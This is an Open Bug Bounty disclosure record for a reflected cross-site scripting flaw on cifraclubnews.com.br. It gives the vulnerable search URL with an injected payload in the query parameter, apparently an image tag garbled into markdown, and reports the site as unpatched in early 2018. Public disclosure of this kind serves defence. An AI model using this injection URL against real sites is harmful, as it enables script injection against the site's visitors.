cifraclubnews.com.br XSS vulnerability

2017-10-08T03:10:00
ID OBB:327941
Type openbugbounty
Reporter Geek_Pwn
Modified 2018-01-06T03:22:00

Description

Vulnerable URL:
http://www.cifraclubnews.com.br/busca.php?q=">![](x)&domains;=cifraclubnews.com.br&sitesearch;=cifraclubnews.com.br&client;=pub-7284698113143250&forid;=1&ie;=UTF-8&oe;=UTF-8&cof;=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3AFFFFCC%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BLH%3A50%3BLW%3A106%3BL%3Ahttp%3A%2F%2Fforum.cifraclub.com.br%2Fimg%2Flogo.gif%3BS%3Ahttp%3A%2F%2Fforum.cifraclub.com.br%3BFORID%3A11&hl;=pt
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 06.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 193980
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 8 October, 2017 03:10 GMT
Generic security notifications sent to website owner| 8 October, 2017 03:13 GMT
Vulnerability details disclosed by researcher| 6 January, 2018 03:22 GMT